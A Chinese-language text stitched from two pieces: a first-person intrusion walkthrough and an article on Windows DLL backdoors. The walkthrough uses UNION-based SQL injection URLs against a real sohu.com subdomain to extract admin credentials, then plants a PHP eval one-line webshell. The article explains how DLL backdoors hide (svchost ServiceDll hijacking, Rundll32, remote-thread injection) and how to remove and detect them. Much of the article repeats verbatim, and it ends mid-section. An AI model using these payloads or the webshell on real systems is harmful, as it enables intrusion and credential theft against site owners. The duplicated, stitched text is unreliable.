http://XXX.it.sohu.com/book/serialize.php?id=86 order by 45/*
......
終于猜測到字段是41左右啦!這里說是左右是因為有些字段是不能排序的,所以還需要我們用union精確定位字段數字是41,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
返回結果如圖5,哈哈,成功了哦!哪些字段會在頁面顯示也是一目了然了!現在讓我們繼續吧!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
返回結果如圖6,完成了數據庫系統的探測哦!我們很有可能不是root,并且數據庫服務器和web也很有可能不是在一臺服務器,這樣的話我們就沒有file權限了!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and (select count(*) from mysql.user)>0/*
返回結果如圖7,沒有對mysql的讀取權限,更加確定權限不是root了!呵呵!
既然不是root,也不要氣餒,讓我們繼續吧!在進一步猜測數據之前我們最好找下后臺先,很多時候找到了管理員密碼卻找不到地方登陸,很郁悶的說!在根目錄下加/admin和/manage/等等后臺常用的地址都是返回404錯誤,猜測了幾次終于在/book/目錄下admin的時候出現了403 Forbiden錯誤,哈哈,是存在這個目錄的!但是登陸頁面死活也猜不出來,郁悶中!不過既然知道有個admin也好說,去Google里搜索:
admin site:sohu.com
如圖8,得到了另外一個分站的論壇,我們知道人是很懶惰的,通常一個地方的后臺的特征就很可能是整個網站的特征,所以當我嘗試訪問/book/admin/admuser.php的時候奇跡出現了,如圖9,哈哈,離成功更近了哦!到這里我們知道了網站的后臺,其實我們還可以得到很重要的信息,查看原文件發現登陸表單的名字是name和password,很容易推測出對方管理員表中的結構,即使不符合估計也差不多,呵呵!所以知道為什么我們要先猜測后臺了吧!繼續注入吧!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin/*
返回錯誤,說明不存在admin這個表,嘗試admins以及admin_user等等,最后提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
的時候返回成功,哈哈!有User這個表!那么是不是管理員表呢?字段又是什么呢?繼續提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回空信息的錯誤,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回結果如圖10,哈哈正常返回并且出來了一個密碼,應該是管理員表里第一個用戶的密碼!那么他的用戶名字是什么呢?猜測很多字段都是返回錯誤,實在沒有辦法的時候輸入一個ID,居然返回成功了!ID就是管理員的名字哦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,id,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回結果如圖11,哈哈,得到管理員的名字了哦!激動地拿著管理員名字和密碼去后臺登陸成功了哦!如圖12。現在是想想怎么拿webshell的時候了,在后臺發現有上傳圖片的地方,但是當上傳php文件的時候提示說不是圖片文件,郁悶了!在后臺仔細的亂七八糟的亂翻了會,發現有個生成php文件的功能,于是在里面插入了一句話的php后門<? eval($_POST[a])?>,如圖13,點生成之后提示成功了,看來如果沒有過濾的話我們應該是得到webshell了,密碼是a,用一句話后門連上去如圖14,哈哈,成功了!腳本檢測到此圓滿完成!
在得到webshell之后我上服務器上看了看,發現服務器的安全是做得不錯,執行不了命令,并且基本上所有的目錄除了我們剛才上傳的目錄之外都是不可寫的,不過作為腳本測試,得到了webshell也就算成功了吧!也可以看出,小小的一個參數沒有過濾就可以導致網站的淪陷,特別是像sohu.com這樣的大站,參數更多,更加要注意過濾方面的問題哦!歡迎大家到論壇討論,我的ID是劍心
前言
后門!相信這個詞語對您來說一定不會陌生,它的危害不然而欲,但隨著人們的安全意識逐步增強,又加上殺毒軟件的"大力支持",使傳統的后門無法在隱藏自己,任何稍微有點計算機知識的人,都知道"查端口""看進程",以便發現一些"蛛絲馬跡"。所以,后門的編寫者及時調整了思路,把目光放到了動態鏈接程序庫上,也就是說,把后門做成DLL文件,然后由某一個EXE做為載體,或者使用Rundll32.exe來啟動,這樣就不會有進程,不開端口等特點,也就實現了進程、端口的隱藏。本文以"DLL的原理""DLL的清除""DLL的防范"為主題,并展開論述,旨在能讓大家對DLL后門"快速上手",不在恐懼DLL后門。好了,進入我們的主題。
一,DLL的原理
1,動態鏈接程序庫
動態鏈接程序庫,全稱:Dynamic Link Library,簡稱:DLL,作用在于為應用程序提供擴展功能。應用程序想要調用DLL文件,需要跟其進行"動態鏈接";從編程的角度,應用程序需要知道DLL文件導出的API函數方可調用。由此可見,DLL文件本身并不可以運行,需要應用程序調用。正因為DLL文件運行時必須插入到應用程序的內存模塊當中,這就說明了:DLL文件無法刪除。這是由于Windows內部機制造成的:正在運行的程序不能關閉。所以,DLL后門由此而生!2,DLL后門原理及特點
把一個實現了后門功能的代碼寫成一個DLL文件,然后插入到一個EXE文件當中,使其可以執行,這樣就不需要占用進程,也就沒有相對應的PID號,也就可以在任務管理器中隱藏。DLL文件本身和EXE文件相差不大,但必須使用程序(EXE)調用才能執行DLL文件。DLL文件的執行,需要EXE文件加載,但EXE想要加載DLL文件,需要知道一個DLL文件的入口函數(既DLL文件的導出函數),所以,根據DLL文件的編寫標準:EXE必須執行DLL文件中的DLLMain()作為加載的條件(如同EXE的mian())。做DLL后門基本分為兩種:1)把所有功能都在DLL文件中實現;2)把DLL做成一個啟動文件,在需要的時候啟動一個普通的EXE后門。
常見的編寫方法:
(1),只有一個DLL文件
這類后門很簡單,只把自己做成一個DLL文件,在注冊表Run鍵值或其他可以被系統自動加載的地方,使用Rundll32.exe來自動啟動。Rundll32.exe是什么?顧名思意,"執行32位的DLL文件"。它的作用是執行DLL文件中的內部函數,這樣在進程當中,只會有Rundll32.exe,而不會有DLL后門的進程,這樣,就實現了進程上的隱藏。如果看到系統中有多個Rundll32.exe,不必驚慌,這證明用Rundll32.exe啟動了多少個的DLL文件。當然,這些Rundll32.exe執行的DLL文件是什么,我們都可以從系統自動加載的地方找到。
現在,我來介紹一下Rundll32.exe這個文件,意思上邊已經說過,功能就是以命令行的方式調用動態鏈接程序庫。系統中還有一個Rundll.exe文件,他的意思是"執行16位的DLL文件",這里要注意一下。在來看看Rundll32.exe使用的函數原型:
Void CALLBACK FunctionName (
HWND hwnd,
HINSTANCE hinst,
LPTSTR lpCmdLine,
Int nCmdShow
);
其命令行下的使用方法為:Rundll32.exe DLLname,Functionname [Arguments]
DLLname為需要執行的DLL文件名;Functionname為前邊需要執行的DLL文件的具體引出函數;[Arguments]為引出函數的具體參數。
(2),替換系統中的DLL文件
這類后門就比上邊的先進了一些,它把實現了后門功能的代碼做成一個和系統匹配的DLL文件,并把原來的DLL文件改名。遇到應用程序請求原來的DLL文件時, DLL后門就啟一個轉發的作用,把"參數"傳遞給原來的DLL文件;如果遇到特殊的請求時(比如客戶端),DLL后門就開始,啟動并運行了。對于這類后門,把所有操作都在DLL文件中實現最為安全,但需要的編程知識也非常多,也非常不容易編寫。所以,這類后門一般都是把DLL文件做成一個"啟動"文件,在遇到特殊的情況下(比如客戶端的請求),就啟動一個普通的EXE后門;在客戶端結束連接之后,把EXE后門停止,然后DLL文件進入"休息"狀態,在下次客戶端連接之前,都不會啟動。但隨著微軟的"數字簽名"和"文件恢復"的功能出臺,這種后門已經逐步衰落。
提示:
在WINNT\system32目錄下,有一個dllcache文件夾,里邊存放著眾多DLL文件(也包括一些重要的EXE文件),在DLL文件被非法修改之后,系統就從這里來恢復被修改的DLL文件。如果要修改某個DLL文件,首先應該把dllcache目錄下的同名DLL文件刪除或更名,否則系統會自動恢復。
(3),動態嵌入式
這才是DLL后門最常用的方法。其意義是將DLL文件嵌入到正在運行的系統進程當中。在Windows系統中,每個進程都有自己的私有內存空間,但還是有種種方法來進入其進程的私有內存空間,來實現動態嵌入式。由于系統的關鍵進程是不能終止的,所以這類后門非常隱蔽,查殺也非常困難。常見的動態嵌入式有:"掛接API""全局鉤子(HOOK)""遠程線程"等。
遠程線程技術指的是通過在一個進程中創建遠程線程的方法來進入那個進程的內存地址空間。當EXE載體(或Rundll32.exe)在那個被插入的進程里創建了遠程線程,并命令它執行某個DLL文件時,我們的DLL后門就掛上去執行了,這里不會產生新的進程,要想讓DLL后門停止,只有讓這個鏈接DLL后門的進程終止。但如果和某些系統的關鍵進程鏈接,那就不能終止了,如果你終止了系統進程,那Windows也隨即被終止!!!
3,DLL后門的啟動特性
啟動DLL后門的載體EXE是不可缺少的,也是非常重要的,它被稱為:Loader。如果沒有Loader,那我們的DLL后門如何啟動呢?因此,一個好的DLL后門會盡力保護自己的Loader不被查殺。Loader的方式有很多,可以是為我們的DLL后門而專門編寫的一個EXE文件;也可以是系統自帶的Rundll32.exe,即使停止了Rundll32.exe,DLL后門的主體還是存在的。3721網絡實名就是一個例子,雖然它并不是"真正"的后門。
二,DLL的清除
本節以三款比較有名的DLL后門例,分別為"SvchostDLL.dll""BITS.dll""QoServer.dll"。詳細講解其手工清除方法。希望大家在看過這三款DLL后門的清除方法之后,能夠舉一反三,靈活運用,在不懼怕DLL后門。其實,手工清除DLL后門還是比較簡單的,無非就是在注冊表中做文章。具體怎么做,請看下文。
1,PortLess BackDoor
這是一款功能非常強大的DLL后門程序,除了可以獲得Local System權限的Shell之外,還支持如"檢測克隆帳戶""安裝終端服務"等一系列功能(具體可以參見程序幫助),適用Windows2000/xp/2003等系統。程序使用svchost.exe來啟動,平常不開端口,可以進行反向連接(最大的特點哦),對于有防火墻的主機來說,這個功能在好不過了。
在介紹清除方法之前,我們先來簡單的介紹一下svchost.exe這個系統的關鍵服務:
Svchost只是做為服務的宿主,本身并不實現什么功能,如果需要使用Svchost來啟動服務,則某個服務是以DLL形式實現的,該DLL的載體Loader指向svchost,所以,在啟動服務的時候由svchost調用該服務的DLL來實現啟動的目的。使用svchost啟動某個服務的DLL文件是由注冊表中的參數來決定的,在需要啟動服務的下邊都有一個Parameters子鍵,其中的ServiceDll表明該服務由哪個DLL文件負責,并且這個DLL文件必須導出一個ServiceMain()函數,為處理服務任務提供支持。
呵呵!看了上邊的理論,是不是有點蒙(我都快睡著了),別著急,我們來看看具體的內容(如圖1)。從圖1中,我們可以看到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs下的Parameters子鍵,其鍵值為%SystemRoot%\system32\rpcss.dll。這就說明:啟動RpcSs服務時。Svchost調用WINNT\system32目錄下的rpcss.dll。
在來看看圖2,這是注冊表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,里邊存放著Svchost啟動的組和組內的各個服務,其中netsvcs組的服務最多。要使用Svchost啟動某個服務,則該服務名就會出現在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost下。這里有四種方法來實現:
1, 添加一個新的組,在組里添加服務名
2, 在現有組里添加服務名
3, 直接使用現有組里的一個服務名,但是本機沒有安裝的服務
4, 修改現有組里的現有服務,把它的ServiceDll指向自己的DLL后門
我測試的PortLess BackDoor使用的第三種方法。
好了,我想大家看完了上邊的原理,一定可以想到我們清除PortLess BackDoor的方法了,對,就是在注冊表的Svchost鍵下做文章。好,我們現在開始。
注:由于本文只是介紹清除方法,使用方法在此略過。
后門的Loader把SvchostDLL.dll插入Svchost進程當中,所以,我們先打開Windows優化大師中的Windows進程管理2.5,查看Svchost進程中的模塊信息(如圖3),從圖3中我們可以看到,SvchostDLL.dll已經插入到Svchost進程中了,在根據"直接使用現有組里的一個服務名,但是本機沒有安裝的服務"的提示,我們可以斷定,在"管理工具"—"服務"中會有一項新的服務。圖4證明了我的說法,此服務名稱為:IPRIP,由Svchost啟動,-k netsvcs表示此服務包含在netsvcs服務組中。
我們把該服務停掉,然后打開注冊表編輯器(開始—運行--regedit),來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IPRIP下,查看其Parameters子鍵(如圖5)。Program鍵的鍵值SvcHostDLL.exe為后門的Loader;ServiceDll的鍵值C:\WINNT\system32\svchostdll.dll為調用的DLL文件,這正是后門的DLL文件。現在我們刪除IPRIP子鍵(或者用SC來刪除),然后在來到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost下,編輯netsvcs服務組,把49 00 70 00 72 00 69 00 70 00 00 00刪除,這里對應的就是IPRIP的服務名,具體如圖6所示。然后退出,重啟。重啟之后刪除WINNT\system32目錄下的后門文件即可。
2,BITS.dll
這是榕哥的作品,也是DLL后門,和SvchostDLL.dll原理基本一樣,不過這里使用的是上邊介紹的第四種方法,即"修改現有組里的現有服務,把它的ServiceDll指向自己的DLL后門"。換句話說,該后門修改現有的某一個服務,把其原有服務的DLL指向自己(也就是BITS.dll),這樣就達到了自動加載的目的;其次,該后門沒有自己的Loader,而是使用系統自帶的Rundll32.exe來加載。我們還是用Windows 進程管理2.5來查看,從圖7中,我們可以看到bits.dll已經插入到Svchost進程當中。
好,現在我們來看看具體的清除方法,由于該后門是修改現有服務,而我們并不知道具體是修改了哪個服務,所以,在注冊表中搜索bits.dll,最后在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto下搜索到了bits.dll,查看Parameters子鍵下的ServiceDll,其鍵值為C:\WINNT\system32\bits.dll(如圖8)。原來,該后門把RasAuto服務原來的DLL文件替換為bits.dll了,這樣來實現自動加載。知道了原因就好辦了,現在我們把ServiceDll的鍵值修改為RasAuto服務原有的DLL文件,即%SystemRoot%\System32\rasauto.dll,退出,重啟。之后刪除WINNT\system32目錄下的bits.dll即可。
3,NOIR--QUEEN
NOIR--QUEEN(守護者)是一個DLL后門&木馬程序,服務端以DLL文件的形式插入到系統的Lsass.exe進程里,由于Lsass.exe是系統的關鍵進程,所以不能終止。在來介紹清除方法之前,我先介紹一下Lsass.exe進程:
這是一個本地的安全授權服務,并且它會為使用Winlogon服務的授權用戶生成一個進程,如果授權是成功的,Lsass就會產生用戶的進入令牌,令牌使用啟動初始 的Shell。其他的由用戶初始化的進程會繼承這個令牌。
從上邊的介紹我們就可以看出Lsass對系統的重要性,那具體怎么清除呢?請看下文。
后門在安裝成功后,會在服務中添加一個名為QoSserver的服務,并把QoSserver.dll后門文件插入到Lsass進程當中,使其可以隱藏進程并自動啟動(如圖9)。現在我們打開注冊表,來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\QoSserver,直接刪除QoSserver鍵,然后重啟。重啟之后,我們在來到服務列表中,會看到QoSserver服務還在,但沒有啟動,類別是自動,我們把他修改為"已禁用";然后往上看,會發現一個服務名為AppCPI的服務,其可執行程序指向QoSserver.exe(原因后邊我會說到),具體如圖11所示。我們再次打開注冊表,來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppCPI,刪除AppCPI鍵,重啟,再刪除QoSserver,最后刪除WINNT\system32目錄下的后門文件。
本人和這個后門"搏斗"了3個多小時,重啟N次。原因在于即使刪除了QoSserver服務,后門還是在運行,而且服務列表中的QoSserver服務又"死灰復燃"。后來才知道原因:在我刪除了QoSserver服務并重啟之后,插入到Lsass進程當中的QoSserver.dll文件又恢復了QoSserver服務,并且生成了另外一個服務,即AppCPI,所以我們必須在到注冊表中刪除AppCPI服務才算是把該后門清除。由此可以看出,現在的后門的保護措施,真是一環扣環。
注意:在刪除QoSserver服務并重啟之后,恢復的QoSserver的啟動類別要修改為"已禁用",否則即便刪除了AppCPI服務,QoSserver服務又運行了。
三,DLL的防范
看了上邊的例子,我想大家對清除DLL后門的方法有了一定的了解,但在現實中,DLL后門并不會使用默認的文件名,所以你也就不能肯定是否中了DLL后門。對于DLL后門,system32目錄下是個好地方,大多數后門也是如此,所以這里要非常注意。下面我來具體介紹一下怎么發現DLL后門,希望對大家有所幫助。
1,安裝好系統和所有的應用程序之后,備份system32目錄下的EXE和DLL文件:打開CMD,來到WINNT\system32目錄下,執行:dir *.exe>exe.txt & dir *.dll>dll.txt,這樣,就會把所有的EXE和DLL文件備份到exe.txt和dll.txt文件中;日后,如發現異常,可以使用相同的命令再次備份EXE和DLL文件(這里我們假設是exe0.txt和dll0.txt),并使用:fc exe.txt exe0.txt>exedll.txt & fc dll.txt dll0.txt>exedll.txt,其意思為使用FC命令比較兩次的EXE文件和DLL文件,并將比較結果保存到exedll.txt文件中。通過這種方法,我們就可以發現多出來的EXE和DLL文件,并通過文件大小,創建時間來判斷是否是DLL后門。
2,使用內存/模塊工具來查看進程調用的DLL文件,比如Windows優化大師中的Windows 進程管理 2.5。這樣,可以發現進程到底調用了什么DLL文件,在結合上邊用FC命令比較出來的結果,又能進一步來確定是否中了DLL后門。如果沒有優化大師,可以使用TaskList,這個小工具也可以顯示進程調用的DLL文件,而且還有源代碼,方便修改。
3,普通后門連接需要打開特定的端口,DLL后門也不例外,不管它怎么隱藏,連接的時候都需要打開端口。我們可以用netstat -an來查看所有TCP/UDP端口的連接,以發現非法連接。大家平時要對自己打開的端口心中有數,并對netstat -an中的state屬性有所了解。當然,也可以使用Fport來顯示端口對應的進程,這樣,系統有什么不明的連接和端口,都可以盡收眼底。
4,定期檢查系統自動加載的地方,比如:注冊表,Winstart.bat,Autoexec.bat,win.ini,system.ini,wininit.ini,Autorun.inf,Config.sys等。其次是對服務進行管理,對系統默認的服務要有所了解,在發現有問題的服務時,可以使用Windows 2000 Server Resource Kit中的SC來刪除。以上這些地方都可以用來加載DLL后門的Loader,如果我們把DLL后門Loader刪除了,試問?DLL后門還怎么運行?!
通過使用上邊的方法,我想大多數DLL后門都可以"現形",如果我們平時多做一些備份,那對查找DLL后門會啟到事半功倍的效果。
后門!相信這個詞語對您來說一定不會陌生,它的危害不然而欲,但隨著人們的安全意識逐步增強,又加上殺毒軟件的"大力支持",使傳統的后門無法在隱藏自己,任何稍微有點計算機知識的人,都知道"查端口""看進程",以便發現一些"蛛絲馬跡"。所以,后門的編寫者及時調整了思路,把目光放到了動態鏈接程序庫上,也就是說,把后門做成DLL文件,然后由某一個EXE做為載體,或者使用Rundll32.exe來啟動,這樣就不會有進程,不開端口等特點,也就實現了進程、端口的隱藏。本文以"DLL的原理""DLL的清除""DLL的防范"為主題,并展開論述,旨在能讓大家對DLL后門"快速上手",不在恐懼DLL后門。好了,進入我們的主題。
一,DLL的原理
1,動態鏈接程序庫
動態鏈接程序庫,全稱:Dynamic Link Library,簡稱:DLL,作用在于為應用程序提供擴展功能。應用程序想要調用DLL文件,需要跟其進行"動態鏈接";從編程的角度,應用程序需要知道DLL文件導出的API函數方可調用。由此可見,DLL文件本身并不可以運行,需要應用程序調用。正因為DLL文件運行時必須插入到應用程序的內存模塊當中,這就說明了:DLL文件無法刪除。這是由于Windows內部機制造成的:正在運行的程序不能關閉。所以,DLL后門由此而生!2,DLL后門原理及特點
把一個實現了后門功能的代碼寫成一個DLL文件,然后插入到一個EXE文件當中,使其可以執行,這樣就不需要占用進程,也就沒有相對應的PID號,也就可以在任務管理器中隱藏。DLL文件本身和EXE文件相差不大,但必須使用程序(EXE)調用才能執行DLL文件。DLL文件的執行,需要EXE文件加載,但EXE想要加載DLL文件,需要知道一個DLL文件的入口函數(既DLL文件的導出函數),所以,根據DLL文件的編寫標準:EXE必須執行DLL文件中的DLLMain()作為加載的條件(如同EXE的mian())。做DLL后門基本分為兩種:1)把所有功能都在DLL文件中實現;2)把DLL做成一個啟動文件,在需要的時候啟動一個普通的EXE后門。
常見的編寫方法:
(1),只有一個DLL文件
這類后門很簡單,只把自己做成一個DLL文件,在注冊表Run鍵值或其他可以被系統自動加載的地方,使用Rundll32.exe來自動啟動。Rundll32.exe是什么?顧名思意,"執行32位的DLL文件"。它的作用是執行DLL文件中的內部函數,這樣在進程當中,只會有Rundll32.exe,而不會有DLL后門的進程,這樣,就實現了進程上的隱藏。如果看到系統中有多個Rundll32.exe,不必驚慌,這證明用Rundll32.exe啟動了多少個的DLL文件。當然,這些Rundll32.exe執行的DLL文件是什么,我們都可以從系統自動加載的地方找到。
現在,我來介紹一下Rundll32.exe這個文件,意思上邊已經說過,功能就是以命令行的方式調用動態鏈接程序庫。系統中還有一個Rundll.exe文件,他的意思是"執行16位的DLL文件",這里要注意一下。在來看看Rundll32.exe使用的函數原型:
Void CALLBACK FunctionName (
HWND hwnd,
HINSTANCE hinst,
LPTSTR lpCmdLine,
Int nCmdShow
);
其命令行下的使用方法為:Rundll32.exe DLLname,Functionname [Arguments]
DLLname為需要執行的DLL文件名;Functionname為前邊需要執行的DLL文件的具體引出函數;[Arguments]為引出函數的具體參數。
(2),替換系統中的DLL文件
這類后門就比上邊的先進了一些,它把實現了后門功能的代碼做成一個和系統匹配的DLL文件,并把原來的DLL文件改名。遇到應用程序請求原來的DLL文件時, DLL后門就啟一個轉發的作用,把"參數"傳遞給原來的DLL文件;如果遇到特殊的請求時(比如客戶端),DLL后門就開始,啟動并運行了。對于這類后門,把所有操作都在DLL文件中實現最為安全,但需要的編程知識也非常多,也非常不容易編寫。所以,這類后門一般都是把DLL文件做成一個"啟動"文件,在遇到特殊的情況下(比如客戶端的請求),就啟動一個普通的EXE后門;在客戶端結束連接之后,把EXE后門停止,然后DLL文件進入"休息"狀態,在下次客戶端連接之前,都不會啟動。但隨著微軟的"數字簽名"和"文件恢復"的功能出臺,這種后門已經逐步衰落。
提示:
在WINNT\system32目錄下,有一個dllcache文件夾,里邊存放著眾多DLL文件(也包括一些重要的EXE文件),在DLL文件被非法修改之后,系統就從這里來恢復被修改的DLL文件。如果要修改某個DLL文件,首先應該把dllcache目錄下的同名DLL文件刪除或更名,否則系統會自動恢復。
(3),動態嵌入式
這才是DLL后門最常用的方法。其意義是將DLL文件嵌入到正在運行的系統進程當中。在Windows系統中,每個進程都有自己的私有內存空間,但還是有種種方法來進入其進程的私有內存空間,來實現動態嵌入式。由于系統的關鍵進程是不能終止的,所以這類后門非常隱蔽,查殺也非常困難。常見的動態嵌入式有:"掛接API""全局鉤子(HOOK)""遠程線程"等。
遠程線程技術指的是通過在一個進程中創建遠程線程的方法來進入那個進程的內存地址空間。當EXE載體(或Rundll32.exe)在那個被插入的進程里創建了遠程線程,并命令它執行某個DLL文件時,我們的DLL后門就掛上去執行了,這里不會產生新的進程,要想讓DLL后門停止,只有讓這個鏈接DLL后門的進程終止。但如果和某些系統的關鍵進程鏈接,那就不能終止了,如果你終止了系統進程,那Windows也隨即被終止!!!
3,DLL后門的啟動特性
啟動DLL后門的載體EXE是不可缺少的,也是非常重要的,它被稱為:Loader。如果沒有Loader,那我們的DLL后門如何啟動呢?因此,一個好的DLL后門會盡力保護自己的Loader不被查殺。Loader的方式有很多,可以是為我們的DLL后門而專門編寫的一個EXE文件;也可以是系統自帶的Rundll32.exe,即使停止了Rundll32.exe,DLL后門的主體還是存在的。3721網絡實名就是一個例子,雖然它并不是"真正"的后門。
二,DLL的清除
本節以三款比較有名的DLL后門例,分別為"SvchostDLL.dll""BITS.dll""QoServer.dll"。詳細講解其手工清除方法。希望大家在看過這三款DLL后門的清除方法之后,能夠舉一反三,靈活運用,在不懼怕DLL后門。其實,手工清除DLL后門還是比較簡單的,無非就是在注冊表中做文章。具體怎么做,請看下文。
1,PortLess BackDoor
這是一款功能非常強大的DLL后門程序,除了可以獲得Local System權限的Shell之外,還支持如"檢測克隆帳戶""安裝終端服務"等一系列功能(具體可以參見程序幫助),適用Windows2000/xp/2003等系統。程序使用svchost.exe來啟動,平常不開端口,可以進行反向連接(最大的特點哦),對于有防火墻的主機來說,這個功能在好不過了。
在介紹清除方法之前,我們先來簡單的介紹一下svchost.exe這個系統的關鍵服務:
Svchost只是做為服務的宿主,本身并不實現什么功能,如果需要使用Svchost來啟動服務,則某個服務是以DLL形式實現的,該DLL的載體Loader指向svchost,所以,在啟動服務的時候由svchost調用該服務的DLL來實現啟動的目的。使用svchost啟動某個服務的DLL文件是由注冊表中的參數來決定的,在需要啟動服務的下邊都有一個Parameters子鍵,其中的ServiceDll表明該服務由哪個DLL文件負責,并且這個DLL文件必須導出一個ServiceMain()函數,為處理服務任務提供支持。
呵呵!看了上邊的理論,是不是有點蒙(我都快睡著了),別著急,我們來看看具體的內容(如圖1)。從圖1中,我們可以看到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs下的Parameters子鍵,其鍵值為%SystemRoot%\system32\rpcss.dll。這就說明:啟動RpcSs服務時。Svchost調用WINNT\system32目錄下的rpcss.dll。
在來看看圖2,這是注冊表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,里邊存放著Svchost啟動的組和組內的各個服務,其中netsvcs組的服務最多。要使用Svchost啟動某個服務,則該服務名就會出現在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost下。這里有四種方法來實現:
1, 添加一個新的組,在組里添加服務名
2, 在現有組里添加服務名
3, 直接使用現有組里的一個服務名,但是本機沒有安裝的服務
4, 修改現有組里的現有服務,把它的ServiceDll指向自己的DLL后門
我測試的PortLess BackDoor使用的第三種方法。
好了,我想大家看完了上邊的原理,一定可以想到我們清除PortLess BackDoor的方法了,對,就是在注冊表的Svchost鍵下做文章。好,我們現在開始。
注:由于本文只是介紹清除方法,使用方法在此略過。
后門的Loader把SvchostDLL.dll插入Svchost進程當中,所以,我們先打開Windows優化大師中的Windows進程管理2.5,查看Svchost進程中的模塊信息(如圖3),從圖3中我們可以看到,SvchostDLL.dll已經插入到Svchost進程中了,在根據"直接使用現有組里的一個服務名,但是本機沒有安裝的服務"的提示,我們可以斷定,在"管理工具"—"服務"中會有一項新的服務。圖4證明了我的說法,此服務名稱為:IPRIP,由Svchost啟動,-k netsvcs表示此服務包含在netsvcs服務組中。
我們把該服務停掉,然后打開注冊表編輯器(開始—運行--regedit),來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IPRIP下,查看其Parameters子鍵(如圖5)。Program鍵的鍵值SvcHostDLL.exe為后門的Loader;ServiceDll的鍵值C:\WINNT\system32\svchostdll.dll為調用的DLL文件,這正是后門的DLL文件。現在我們刪除IPRIP子鍵(或者用SC來刪除),然后在來到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost下,編輯netsvcs服務組,把49 00 70 00 72 00 69 00 70 00 00 00刪除,這里對應的就是IPRIP的服務名,具體如圖6所示。然后退出,重啟。重啟之后刪除WINNT\system32目錄下的后門文件即可。
2,BITS.dll
這是榕哥的作品,也是DLL后門,和SvchostDLL.dll原理基本一樣,不過這里使用的是上邊介紹的第四種方法,即"修改現有組里的現有服務,把它的ServiceDll指向自己的DLL后門"。換句話說,該后門修改現有的某一個服務,把其原有服務的DLL指向自己(也就是BITS.dll),這樣就達到了自動加載的目的;其次,該后門沒有自己的Loader,而是使用系統自帶的Rundll32.exe來加載。我們還是用Windows 進程管理2.5來查看,從圖7中,我們可以看到bits.dll已經插入到Svchost進程當中。
好,現在我們來看看具體的清除方法,由于該后門是修改現有服務,而我們并不知道具體是修改了哪個服務,所以,在注冊表中搜索bits.dll,最后在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto下搜索到了bits.dll,查看Parameters子鍵下的ServiceDll,其鍵值為C:\WINNT\system32\bits.dll(如圖8)。原來,該后門把RasAuto服務原來的DLL文件替換為bits.dll了,這樣來實現自動加載。知道了原因就好辦了,現在我們把ServiceDll的鍵值修改為RasAuto服務原有的DLL文件,即%SystemRoot%\System32\rasauto.dll,退出,重啟。之后刪除WINNT\system32目錄下的bits.dll即可。
3,NOIR--QUEEN
NOIR--QUEEN(守護者)是一個DLL后門&木馬程序,服務端以DLL文件的形式插入到系統的Lsass.exe進程里,由于Lsass.exe是系統的關鍵進程,所以不能終止。在來介紹清除方法之前,我先介紹一下Lsass.exe進程:
這是一個本地的安全授權服務,并且它會為使用Winlogon服務的授權用戶生成一個進程,如果授權是成功的,Lsass就會產生用戶的進入令牌,令牌使用啟動初始 的Shell。其他的由用戶初始化的進程會繼承這個令牌。
從上邊的介紹我們就可以看出Lsass對系統的重要性,那具體怎么清除呢?請看下文。
